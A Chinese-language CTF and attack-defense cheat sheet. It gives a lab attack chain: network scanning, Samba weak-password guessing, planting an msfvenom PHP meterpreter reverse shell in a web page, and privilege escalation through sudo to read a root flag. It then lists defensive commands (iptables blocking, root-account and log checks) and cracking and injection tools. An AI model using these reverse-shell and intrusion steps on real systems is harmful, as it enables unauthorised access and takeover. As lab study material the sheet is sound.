扫描对方IP:
ifconfig (先获取自己的IP)
netdiscover -r 192.168.0.1/24   (扫描1~124的IP)

获取IP后:
nmap -sV 192.168.0.104 (端口扫描)
nmap -A -v -T4 192.168.0.104 (TCP 端口扫描)

若有Samba服务开起:
smbclinet -L 192.168.0.104 (查看目录)

smbclinet '\\192.168.0.104\print$' (进入目录print$)
(一个一个的试)(弱密码猜测)
若进入后:
get a.txt  (可以获取a.txt文件)

mysql -h 192.168.0.104 -u Admin  -p (连接数据库)
(输入密码)  （密码可能藏在某个文件）

searchsploit Samba smbd 3.x - 4.x (搜索)

dirb http://192.168.0.104 (扫描web)

进入网站
登录Admin
使用msf来设置payload
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options (查看)
set lhost (ip)
set lport (ip)
run (监听)

msfvenom -p php/meterpreter/reverse_tcp lhost=(ip) lport=(ip) -f raw
(生成php shell 木马)

将木马复制粘贴到某一个php页面,然后想方设法触发漏洞,通过访问该php,即可触发漏洞

触发成功后:
msf里shell

提权:
id (查看当前的用户uid)
python -c "import pty;pty.spawn('/bin/bash')" 
cat /etc/passwd (获取用户)
su (用户) (有密码自己找)
sudo -l 提权
sudo su
进入查找flag,一般在 /root/proot.txt
cat proot.txt
提交flag!



ssh操作

ssh <-p 端口> 用户名@IP　　//登录
scp 文件路径  用户名@IP:存放路径　　//向ssh服务器上传输文件

备份web目录
　　tar -zcvf web.tar.gz /var/www/html/
用户管理
　　w 　　//查看当前用户
　　pkill -kill -t <用户tty>　　 //踢掉当前登录用户

进程管理

　　ps aux | grep pid或者进程名　　//查看进程信息

　　查看已建立的网络连接及进程
　　netstat -antulp | grep EST

　　查看指定端口被哪个进程占用
　　lsof -i:端口号 或者 netstat -tunlp|grep 端口号

　　结束进程命令
　　kill PID
　　killall <进程名>
　　kill -9 <PID>

iptables命令

　　封杀某个IP或者ip段，如：123.4.5.6
　　iptables -I INPUT -s 123.4.5.6 -j DROP
　　iptables -I INPUT -s 123.4.5.1/24 -j DROP

　　禁止从某个主机ssh远程访问登陆到本机，如123.4.5.6
　　iptable -t filter -A INPUT -s 123.4.5.6 -p tcp --dport 22 -j DROP

Mysql数据库操作

　　备份mysql数据库
　　mysqldump -u 用户名 -p 密码 数据库名 > back.sql　　//备份指定数据库
　　mysqldump --all-databases > bak.sql　　　　//备份所有数据库

　　还原mysql数据库
　　mysql -u 用户名 -p 密码 数据库名 < bak.sql

安全检查

　　find / *.php -perm 4777 　　 //查找777的权限的php文件 
　　awk -F: '{if($3==0)print $1}' /etc/passwd　　//查看root权限的账号
　　crontab -l　　//查看计划任务

　　检测所有的tcp连接数量及状态
　　netstat -ant|awk '{print $5 "\t" $6}' |grep "[1-9][0-9]*\."|sed -e 's/::ffff://' -e 's/:[0-9]*//'|sort|uniq -c|sort -rn

　　查看页面访问排名前十的IP
　　cat /var/log/apache2/access.log | cut -f1 -d " " | sort | uniq -c | sort -k 1 -r | head -10

　　查看页面访问排名前十的URL
　　cat /var/log/apache2/access.log | cut -f4 -d " " | sort | uniq -c | sort -k 1 -r | head -10　　





	搜寻网站简要信息
  curl --head 网站
  xprobe2 -v 网站
  nmap [] 
  -A显示详细版本信息
  -v显示详细信息
  -o显示对方操作系统

  matego

  Web漏洞发现(http扫描)
　webshag
  w3af---(强大专业工具)
  owasp ZAP等同于w3af WEB扫描工具

  注入工具
  Sqlmap

  setoolkit(*****很牛工具)

  aircrack-ng(wifi破解密码)

  

